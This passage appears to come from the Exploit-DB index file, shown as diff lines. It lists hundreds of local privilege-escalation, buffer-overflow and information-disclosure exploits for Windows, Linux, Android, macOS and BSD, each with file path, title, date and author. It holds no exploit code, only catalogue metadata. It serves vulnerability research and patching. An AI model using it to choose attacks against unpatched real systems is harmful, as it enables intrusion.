Ahrens",local,windows, +38775,exploits/linux/local/38775.rb,"Chkrootkit - Local Privilege Escalation (Metasploit)",2015-11-20,Metasploit,local,linux, +38792,exploits/windows/local/38792.txt,"Nvidia Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",local,windows, +38817,exploits/linux/local/38817.txt,"Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",local,linux, +38832,exploits/linux/local/38832.py,"RHEL 7.0/7.1 - 'abrt/sosreport' Local Privilege Escalation",2015-12-01,rebel,local,linux, +38835,exploits/multiple/local/38835.py,"Centos 7.1 / Fedora 22 - abrt Privilege Escalation",2015-12-01,rebel,local,multiple, +38847,exploits/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege Escalation",2015-12-02,"Daniele Linguaglossa",local,windows, +38871,exploits/windows/local/38871.txt,"Cyclope Employee Surveillance 8.6.1 - Insecure File Permissions",2015-12-06,loneferret,local,windows, +38903,exploits/windows/local/38903.txt,"iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions",2015-12-08,LiquidWorm,local,windows, +38904,exploits/windows/local/38904.txt,"iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions",2015-12-08,LiquidWorm,local,windows, +38937,exploits/linux/local/38937.txt,"Apache Libcloud Digital Ocean API - Local Information Disclosure",2014-01-01,anonymous,local,linux, +39010,exploits/linux/local/39010.c,"QEMU (Gentoo) - Local Privilege Escalation",2015-12-17,zx2c4,local,linux, +39035,exploits/win_x86-64/local/39035.txt,"Microsoft Windows 8.1 - 'win32k' Local Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",local,win_x86-64, +39061,exploits/android/local/39061.txt,"GoToMeeting for Android - Multiple Local Information Disclosure Vulnerabilities",2014-01-23,"Claudio J. Lacayo",local,android, +39102,exploits/windows/local/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,local,windows, +39112,exploits/linux/local/39112.txt,"QNX - '.Phgrafx' File Enumeration",2014-03-10,cenobyte,local,linux, +39120,exploits/windows/local/39120.py,"KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP / Denial of Service 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",local,windows, +39121,exploits/windows/local/39121.py,"KiTTY Portable 0.65.0.2p (Windows 7) - Local kitty.ini Overflow (Wow64 Egghunter)",2015-12-29,"Guillaume Kaddouch",local,windows, +39122,exploits/windows/local/39122.py,"KiTTY Portable 0.65.0.2p (Windows 8.1/10) - Local kitty.ini Overflow",2015-12-29,"Guillaume Kaddouch",local,windows, +39132,exploits/windows/local/39132.py,"FTPShell Client 5.24 - Local Buffer Overflow",2015-12-30,hyp3rlinx,local,windows, +39134,exploits/linux/local/39134.txt,"DeleGate 9.9.13 - Local Privilege Escalation",2015-12-30,"Larry W. Cashdollar",local,linux, +39147,exploits/osx/local/39147.c,"Apple Mac OSX - Local Security Bypass",2014-04-22,"Ian Beer",local,osx, +39159,exploits/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,local,windows, +39166,exploits/linux/local/39166.c,"Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)",2016-01-05,rebel,local,linux, +39207,exploits/linux/local/39207.txt,"dpkg Source Package - Index: pseudo-header Processing Multiple Local Directory Traversals",2014-05-25,"Raphael Geissert",local,linux, +39214,exploits/linux/local/39214.c,"Linux Kernel 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure",2014-05-28,"Salva Peiro",local,linux, +39217,exploits/linux/local/39217.c,"Amanda 3.3.1 - Local Privilege Escalation",2016-01-11,"Hacker Fantastic",local,linux, +39230,exploits/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Local Privilege Escalation (2)",2016-01-12,halfdog,local,linux, +39244,exploits/linux/local/39244.txt,"Amanda 3.3.1 - 'amstar' Command Injection Privilege Escalation",2016-01-15,"Hacker Fantastic",local,linux, +39260,exploits/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,local,windows, +39277,exploits/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Privilege Escalation (1)",2016-01-19,"Perception Point Team",local,linux, +40003,exploits/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Privilege Escalation (2)",2016-01-19,"Federico Bento",local,linux, +39284,exploits/windows/local/39284.txt,"Oracle - 'HtmlConverter.exe' Local Buffer Overflow",2016-01-21,hyp3rlinx,local,windows, +39285,exploits/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",local,linux, +40337,exploits/win_x86-64/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",local,win_x86-64, +39310,exploits/windows/local/39310.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) (2)",2016-01-25,"Google Security Research",local,windows, +39311,exploits/windows/local/39311.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) (1)",2016-01-25,"Google Security Research",local,windows, +40360,exploits/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51/5.6.32/5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",local,linux,3306 +40774,exploits/linux/local/40774.sh,"Nagios 4.2.2 - Local Privilege Escalation",2016-11-18,"Vincent Malguy",local,linux, +39340,exploits/android/local/39340.cpp,"Google Android - 'sensord' Local Privilege Escalation",2016-01-27,s0m3b0dy,local,android, +39417,exploits/windows/local/39417.py,"FTPShell Client 5.24 - Create NewFolder Local Buffer Overflow",2016-02-04,"Arash Khazaei",local,windows, +39432,exploits/win_x86/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Local Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,local,win_x86, +39433,exploits/linux/local/39433.py,"Deepin Linux 15 - 'lastore-daemon' Local Privilege Escalation",2016-02-10,"King's Way",local,linux, +39438,exploits/xml/local/39438.txt,"Wieland wieplan 4.1 - Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,local,xml, +39442,exploits/windows/local/39442.txt,"Microsoft Windows - Kerberos Security Feature Bypass (MS16-014)",2016-02-15,"Nabeel Ahmed",local,windows, +39443,exploits/windows/local/39443.py,"Delta Industrial Automation DCISoft 1.12.09 - Local Stack Buffer Overflow",2016-02-15,LiquidWorm,local,windows, +39446,exploits/win_x86/local/39446.py,"Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",local,win_x86, +39480,exploits/windows/local/39480.py,"Core FTP Server 1.2 - Local Buffer Overflow (PoC)",2016-02-22,INSECT.B,local,windows, +39508,exploits/windows/local/39508.ps1,"Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Escalation",2016-02-29,Laughing_Mantis,local,windows, +39510,exploits/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 / M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,local,windows, +39520,exploits/win_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation",2016-03-02,Cr4sh,local,win_x86-64, +39523,exploits/windows/local/39523.rb,"AppLocker - Execution Prevention Bypass (Metasploit)",2016-03-03,Metasploit,local,windows, +39525,exploits/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",local,win_x86-64, +39531,exploits/windows/local/39531.c,"McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass",2016-03-07,"Maurizio Agazzini",local,windows, +39535,exploits/linux/local/39535.sh,"Exim 4.84-3 - Local Privilege Escalation",2016-03-09,"Hacker Fantastic",local,linux, +39549,exploits/linux/local/39549.txt,"Exim < 4.86.2 - Local Privilege Escalation",2016-03-10,"Dawid Golunski",local,linux, +39574,exploits/win_x86/local/39574.cs,"Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",local,win_x86, +39579,exploits/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode (SEH)",2016-03-21,"Rakan Alotaibi",local,windows, +39594,exploits/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - '.m3u' Local Stack Overflow",2016-03-22,"Charley Celice",local,windows, +39595,exploits/multiple/local/39595.txt,"Apple Mac OSX / iOS - SUID Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",local,multiple, +39628,exploits/linux/local/39628.txt,"FireEye - Malware Input Processor Privilege Escalation",2016-03-28,"Google Security Research",local,linux, +39630,exploits/windows/local/39630.g,"Cogent Datahub 7.3.9 Gamma Script - Local Privilege Escalation",2016-03-28,mr_me,local,windows, +39656,exploits/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,local,multiple, +39666,exploits/windows/local/39666.txt,"Microsoft Windows Kernel - 'win32k.sys' Local Privilege Escalation (MS14-058)",2016-04-05,"MWR InfoSecurity",local,windows, +39670,exploits/windows/local/39670.txt,"Panda Security URL Filtering < 4.3.1.9 - Local Privilege Escalation",2016-04-06,"Kyriakos Economou",local,windows, +39671,exploits/windows/local/39671.txt,"Panda Endpoint Administration Agent < 7.50.00 - Local Privilege Escalation",2016-04-06,"Kyriakos Economou",local,windows, +39673,exploits/linux/local/39673.py,"Mess Emulator 0.154-3.1 - Local Buffer Overflow",2016-04-07,"Juan Sacco",local,linux, +39674,exploits/windows/local/39674.py,"Express Zip 2.40 - Directory Traversal",2016-04-08,R-73eN,local,windows, +39675,exploits/osx/local/39675.c,"Apple Intel HD 3000 Graphics Driver 10.0.0 - Local Privilege Escalation",2016-04-08,"Piotr Bania",local,osx, +39680,exploits/windows/local/39680.txt,"CAM UnZip 5.1 - .'ZIP' File Directory Traversal",2016-04-11,hyp3rlinx,local,windows, +39692,exploits/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",local,linux, +39694,exploits/windows/local/39694.txt,"Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",local,windows, +39702,exploits/linux/local/39702.rb,"Exim - 'perl_startup' Local Privilege Escalation (Metasploit)",2016-04-15,Metasploit,local,linux, +39967,exploits/linux/local/39967.txt,"SolarWinds Virtualization Manager - Local Privilege Escalation",2016-06-16,"Nate Kettlewell",local,linux, +39719,exploits/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,local,windows, +39727,exploits/windows/local/39727.txt,"CompuSource Systems Real Time Home Banking - Local Privilege Escalation",2016-04-25,"Information Paradox",local,windows, +39734,exploits/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",local,linux, +39741,exploits/osx/local/39741.txt,"Mach Race OSX - Local Privilege Escalation",2016-04-27,fG!,local,osx, +39757,exploits/android/local/39757.txt,"QSEE - PRDiag* Commands Privilege Escalation",2016-05-02,laginimaineb,local,android, +39764,exploits/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow",2016-05-04,"Juan Sacco",local,linux, +39769,exploits/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",local,linux, +39771,exploits/linux/local/39771.txt,"Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access /etc/shadow)",2016-05-04,"Google Security Research",local,linux, +39772,exploits/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation",2016-05-04,"Google Security Research",local,linux, +39786,exploits/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Local Privilege Escalation",2016-05-09,LiquidWorm,local,windows, +39788,exploits/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,local,windows, +39791,exploits/multiple/local/39791.rb,"ImageMagick 6.9.3-9/7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit)",2016-05-09,Metasploit,local,multiple, +39803,exploits/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",local,windows, +39804,exploits/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 < 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",local,windows, +39809,exploits/windows/local/39809.cs,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,local,windows, +39810,exploits/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Based Overflow",2016-05-13,"Juan Sacco",local,linux, +39811,exploits/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,local,linux, +39814,exploits/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",local,windows, +39820,exploits/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",local,windows, +39843,exploits/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Local Privilege Escalation",2016-05-19,"Paolo Stagno",local,windows, +42551,exploits/windows/local/42551.py,"MP3 WAV to CD Burner 1.4.24 - Local Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",local,windows, +39845,exploits/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Local Privilege Escalation",2016-05-23,LiquidWorm,local,windows, +39888,exploits/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,"Gregory Smiley",local,windows, +39902,exploits/windows/local/39902.txt,"League of Legends Screensaver - Unquoted Service Path Privilege Escalation",2016-06-07,"Vincent Yiu",local,windows, +39903,exploits/windows/local/39903.txt,"League of Legends Screensaver - Insecure File Permissions Privilege Escalation",2016-06-07,"Vincent Yiu",local,windows, +39908,exploits/windows/local/39908.txt,"Matrix42 Remote Control Host 3.20.0031 - Unquoted Path Privilege Escalation",2016-06-10,"Roland C. Redl",local,windows, +39916,exploits/windows/local/39916.txt,"Riot Games League of Legends - Insecure File Permissions Privilege Escalation",2016-06-10,"Cyril Vallicari",local,windows, +39933,exploits/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' File (Universal ASLR + DEP Bypass)",2016-06-13,"Fitzl Csaba",local,windows, +39938,exploits/linux/local/39938.rb,"iSQL 1.0 - Command Injection",2016-06-13,HaHwul,local,linux, +39954,exploits/windows/local/39954.txt,"AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation",2016-06-15,"Cyril Vallicari",local,windows, +40054,exploits/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,local,linux, +39980,exploits/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - Local Stack Overflow (SEH) (Metasploit)",2016-06-20,s0nk3y,local,windows, +39984,exploits/win_x86-64/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,local,win_x86-64, +39992,exploits/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",local,linux, +40017,exploits/windows/local/40017.py,"Mediacoder 0.8.43.5830 - '.m3u' Local Buffer Overflow (SEH)",2016-06-27,"Sibusiso Sishi",local,windows, +40018,exploits/windows/local/40018.py,"VUPlayer 2.49 (Windows 7) - '.m3u' Local Buffer Overflow (DEP Bypass)",2016-06-27,secfigo,local,windows, +40020,exploits/windows/local/40020.txt,"Panda Security (Multiple Products) - Local Privilege Escalation",2016-06-27,Security-Assessment.com,local,windows, +40023,exploits/linux/local/40023.py,"PInfo 0.6.9-5.1 - Local Buffer Overflow",2016-06-27,"Juan Sacco",local,linux, +40025,exploits/linux/local/40025.py,"HNB 1.9.18-10 - Local Buffer Overflow",2016-06-27,"Juan Sacco",local,linux, +40039,exploits/win_x86/local/40039.cpp,"Microsoft Windows 7 SP1 (x86) - Local Privilege Escalation (MS16-014)",2016-06-29,blomster81,local,win_x86, +40040,exploits/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution",2016-06-29,Cr4sh,local,windows, +40043,exploits/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",local,windows, +40049,exploits/lin_x86-64/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,local,lin_x86-64, +40066,exploits/android/local/40066.txt,"Samsung Android JACK - Local Privilege Escalation",2016-07-06,"Google Security Research",local,android, +40069,exploits/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",local,windows, +40071,exploits/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Local Privilege Escalation",2016-07-08,sh4d0wman,local,windows, +40072,exploits/windows/local/40072.txt,"InstantHMI 6.1 - Local Privilege Escalation",2016-07-08,sh4d0wman,local,windows, +40107,exploits/windows/local/40107.rb,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) (Metasploit)",2016-07-13,Metasploit,local,windows, +40145,exploits/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Local Privilege Escalation",2016-07-25,LiquidWorm,local,windows, +40118,exploits/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051)",2016-06-22,"Brian Pak",local,windows, +40132,exploits/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Local Privilege Escalation",2016-07-20,LiquidWorm,local,windows, +40141,exploits/bsd/local/40141.c,"NetBSD - 'mail.local(8)' Local Privilege Escalation",2016-07-21,akat1,local,bsd, +40148,exploits/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' (SEH)",2016-07-25,"Karn Ganeshen",local,windows, +40151,exploits/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",local,windows, +40164,exploits/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' (PoC)",2013-03-06,"Artem Shishkin",local,multiple, +42550,exploits/windows/local/42550.py,"My Video Converter 1.5.24 - Local Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",local,windows, +40169,exploits/linux/local/40169.txt,"VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation",2013-08-22,"Tavis Ormandy",local,linux, +40172,exploits/windows/local/40172.py,"VUPlayer 2.49 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,local,windows, +40173,exploits/windows/local/40173.txt,"mySCADAPro 7 - Local Privilege Escalation",2016-07-29,"Karn Ganeshen",local,windows, +40203,exploits/linux/local/40203.py,"zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow",2016-08-05,"Juan Sacco",local,linux, +40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",local,windows, +40224,exploits/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,local,windows, +40226,exploits/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,local,windows, +40268,exploits/windows/local/40268.rb,"Microsoft Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit)",2016-08-19,"Pablo González",local,windows, +40270,exploits/linux/local/40270.txt,"Watchguard Firewalls - 'ESCALATEPLOWMAN' ifconfig Privilege Escalation",2016-08-19,"Shadow Brokers",local,linux, +40271,exploits/hardware/local/40271.txt,"Cisco ASA / PIX - 'EPICBANANA' Local Privilege Escalation",2016-08-19,"Shadow Brokers",local,hardware, +40322,exploits/windows/local/40322.txt,"ZKTeco ZKTime.Net 3.0.1.6 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,local,windows, +40323,exploits/windows/local/40323.txt,"ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,local,windows, +40330,exploits/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",local,windows, +40438,exploits/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,local,windows, +40442,exploits/windows/local/40442.txt,"NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,local,windows, +40443,exploits/windows/local/40443.txt,"Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,local,windows, +40450,exploits/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation",2016-10-03,"Dawid Golunski",local,linux, +40451,exploits/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",local,win_x86-64, +40460,exploits/windows/local/40460.txt,"Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,local,windows, +40461,exploits/windows/local/40461.txt,"Fortitude HTTP 1.0.4.0 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,local,windows, +40471,exploits/windows/local/40471.txt,"Comodo Dragon Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,local,windows, +40473,exploits/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,local,windows, +40539,exploits/windows/local/40539.txt,"NETGATE Registry Cleaner 16.0.205 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows, +40477,exploits/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,local,windows, +40478,exploits/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",local,windows, +40482,exploits/windows/local/40482.txt,"Fitbit Connect Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",local,windows, +40483,exploits/windows/local/40483.txt,"Leap Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",local,windows, +40484,exploits/windows/local/40484.txt,"Wacom Consumer Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",local,windows, +40485,exploits/windows/local/40485.txt,"Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",local,windows, +40488,exploits/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat Based Distros) - Local Privilege Escalation",2016-10-10,"Dawid Golunski",local,linux, +40489,exploits/linux/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation",2016-10-10,"Qian Zhang",local,linux, +40490,exploits/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,local,windows, +40494,exploits/windows/local/40494.txt,"Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",local,windows, +40497,exploits/windows/local/40497.txt,"Sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,local,windows, +40564,exploits/win_x86/local/40564.c,"Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)",2016-10-18,"Tomislav Paskalev",local,win_x86, +40503,exploits/linux/local/40503.rb,"Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit)",2016-10-11,Metasploit,local,linux, +40504,exploits/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)",2016-10-11,Metasploit,local,android, +40523,exploits/windows/local/40523.txt,"ATKGFNEXSrv ATKGFNEX 1.0.11.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",local,windows, +40525,exploits/windows/local/40525.txt,"IObit Malware Fighter 4.3.1 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,local,windows, +40528,exploits/windows/local/40528.txt,"Hotspot Shield 6.0.3 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,local,windows, +40533,exploits/windows/local/40533.txt,"NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation",2016-10-14,"Ehsan Hosseini",local,windows, +40535,exploits/windows/local/40535.txt,"Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation",2016-10-14,"Saeed Hasanzadeh",local,windows, +40538,exploits/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",local,windows, +40540,exploits/windows/local/40540.txt,"NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows, +40541,exploits/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows, +40550,exploits/windows/local/40550.txt,"Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation",2016-10-17,Amir.ght,local,windows, +40562,exploits/windows/local/40562.cpp,"Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)",2016-10-17,"Google Security Research",local,windows, +40567,exploits/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,local,windows, +40572,exploits/windows/local/40572.cs,"Microsoft Windows - DFS Client Driver Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",local,windows, +40573,exploits/windows/local/40573.cs,"Microsoft Windows - DeviceApi CMApi PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",local,windows, +40574,exploits/windows/local/40574.cs,"Microsoft Windows - DeviceApi CMApi User Hive Impersonation Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",local,windows, +40577,exploits/windows/local/40577.txt,"IObit Advanced SystemCare 10.0.2 - Unquoted Service Path Privilege Escalation",2016-10-19,Amir.ght,local,windows, +40578,exploits/windows/local/40578.py,"HikVision Security Systems - Activex Buffer Overflow",2016-10-19,"Yuriy Gurkin",local,windows, +40579,exploits/windows/local/40579.txt,"Intel(R) Management Engine Components 8.0.1.1399 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",local,windows, +40580,exploits/windows/local/40580.txt,"Lenovo RapidBoot HDD Accelerator 1.00.0802 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",local,windows, +40581,exploits/windows/local/40581.txt,"Lenovo Slim USB Keyboard 1.09 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",local,windows, +40582,exploits/windows/local/40582.txt,"Vembu StoreGrid 4.0 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",local,windows, +40585,exploits/windows/local/40585.txt,"Lenovo ThinkVantage Communications Utility 3.0.42.0 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",local,windows, +40583,exploits/windows/local/40583.txt,"Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed 15.1.0.0096 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",local,windows, +40586,exploits/windows/local/40586.txt,"PDF Complete 4.1.12 Corporate Edition - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",local,windows, +40587,exploits/windows/local/40587.txt,"Realtek High Definition Audio Driver 6.0.1.6730 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",local,windows, +40588,exploits/multiple/local/40588.txt,"Oracle Netbeans IDE 8.1 - Directory Traversal",2016-10-20,hyp3rlinx,local,multiple, +40606,exploits/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",local,windows, +40607,exploits/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",local,windows, +40608,exploits/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",local,windows, +40611,exploits/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access Method)",2016-10-19,"Phil Oester",local,linux, +40616,exploits/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege 